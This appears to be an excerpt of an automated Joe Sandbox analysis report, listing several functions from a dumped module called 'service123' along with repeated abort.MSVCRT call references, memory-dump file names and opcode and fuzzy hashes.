Instruction ID: 024b8e2ddb27a81b87616e3bbd43f976f59fb4cc5ee1c8d7afed0ba6beb60036
Opcode Fuzzy Hash: f18e6527ebb016665c276bd2714d8da531117bac7964fd80a5ec5a9eca6e2d7e
Instruction Fuzzy Hash: B01190B2606201CBE708EF18E891B55B7B1FB22309F019A48D184DBB11D739E868CBA0

Function 6C9429F0 Relevance: 42.1, APIs: 28, Instructions: 78COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: db5b5d99b46dd221ed370f5968e158f2b3055a9b8b29c484ba77d6d8211641b5
Instruction ID: d6cd7790238a88f64d027e11aa4a4e4b49efef03a42f693ebd683c2fbb4cea91
Opcode Fuzzy Hash: db5b5d99b46dd221ed370f5968e158f2b3055a9b8b29c484ba77d6d8211641b5
Instruction Fuzzy Hash: 8101E8B2606201CFE708EF2CE495B55B7B1FB22309F059A48D184DBB11D739E468CB90

Function 6C9428BB Relevance: 42.1, APIs: 28, Instructions: 73COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 7277eafbe754cc6ec1c2ef36f6949389768cb9babf8f433899b9e2f485ee3065
Instruction ID: f9d43d3faf86fe5b682cad1c706b5f812d828c50316906f6016a004e61b23e0e
Opcode Fuzzy Hash: 7277eafbe754cc6ec1c2ef36f6949389768cb9babf8f433899b9e2f485ee3065
Instruction Fuzzy Hash: F00119B2606201CBE708EF18D591B56B7B1FB22309F019A48C185DBF01C735E468CF91

Function 6C942A6E Relevance: 42.1, APIs: 28, Instructions: 71COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 4c13d01faafb8654f9c6695b74faf787c9fd2bffecf51c9cee498a15943dd7c8
Instruction ID: f0729ffe294b8ada7cb8fe81dd39e554e6ed83bcc648a1ddc06db2681b548919
Opcode Fuzzy Hash: 4c13d01faafb8654f9c6695b74faf787c9fd2bffecf51c9cee498a15943dd7c8
Instruction Fuzzy Hash: 690137B260A201CBE708EF18D491B6AB7B1FB2230DF019A48C484DBF01C735E468CB90

Function 6C942B13 Relevance: 42.1, APIs: 28, Instructions: 69COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bf806f775b79d5d51ddaf6adb994487e59efeb12fc7ccd7205f08df816d6936c
Instruction ID: 485c497218f6623c2d771b37373fe80a66355959d001657bdf726a0e72a0fc90
Opcode Fuzzy Hash: bf806f775b79d5d51ddaf6adb994487e59efeb12fc7ccd7205f08df816d6936c
Instruction Fuzzy Hash: 3EF0F9B5509601CBE704EF18E495B66B7B1FB2234DF059A48C4849BF06D735E468CF91

Function 6C9429B1 Relevance: 42.1, APIs: 28, Instructions: 67COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: dbe009e4f47f5fe28e476f39a6c9657fc11ef46b218938f2a4027bb21b0ddbd3
Instruction ID: 4be2ff4527553f167e5d2d6ee12eeb942a3823f7146f2820f33c07b4ee043f51
Opcode Fuzzy Hash: dbe009e4f47f5fe28e476f39a6c9657fc11ef46b218938f2a4027bb21b0ddbd3
Instruction Fuzzy Hash: B9F017B1649601CBE704EF18E094B6AB7B1FF2234CF059A48C4449BF06D735E46DCB95

Function 6C942AAD Relevance: 42.1, APIs: 28, Instructions: 65COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 6CA16CF4
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 5fb5225730afd2ddcfcb02f3ebc37d42b7060ccf102657df9cdae2d4ebebc9ec
Instruction ID: eb31ba4902ba09f3d47900eeb69acf368f955ced16ac02bf70e35fd58c3a25ad
Opcode Fuzzy Hash: 5fb5225730afd2ddcfcb02f3ebc37d42b7060ccf102657df9cdae2d4ebebc9ec
Instruction Fuzzy Hash: 03F03AB15096018BD704EF18D09076AB771FF22308F059E48C4459BF06D735E468CFD1

Function 6C94B930 Relevance: 40.6, APIs: 27, Instructions: 135COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CF9
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16CFE
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D03
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D08
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D12
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D17
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D21
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D26
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D30
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D35
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C94C5DB), ref: 6CA16D44
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D4C
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D51
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D56
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D5B
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D60
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D65
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6A
abort.MSVCRT(?,?,?,?,?,?,6C94E2F4,?,?,?,?,?,?,00000000,00000001,6C95008D), ref: 6CA16D6F
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D74
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D79
abort.MSVCRT(?,?,00000000,00000000,?,76F8E010,6C95038F), ref: 6CA16D7E

Memory Dump Source

Source File: 00000005.00000002.2635708772.000000006C941000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C940000, based on PE: true

Associated: 00000005.00000002.2635694768.000000006C940000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635780981.000000006CA1D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635795706.000000006CA1F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635825355.000000006CA68000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635837592.000000006CA69000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2635851237.000000006CA6C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c940000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2c1eb0c0d16349cb0f53ff0ab8492635e1bca1a3512e9e77827b17cf08a068f2
Instruction ID: 70ea114a19d4582e51fda67093b5d87b5d0d92844a6c8d6440f258d3b7fd2976
Opcode Fuzzy Hash: 2c1eb0c0d16349cb0f53ff0ab8492635e1bca1a3512e9e77827b17cf08a068f2
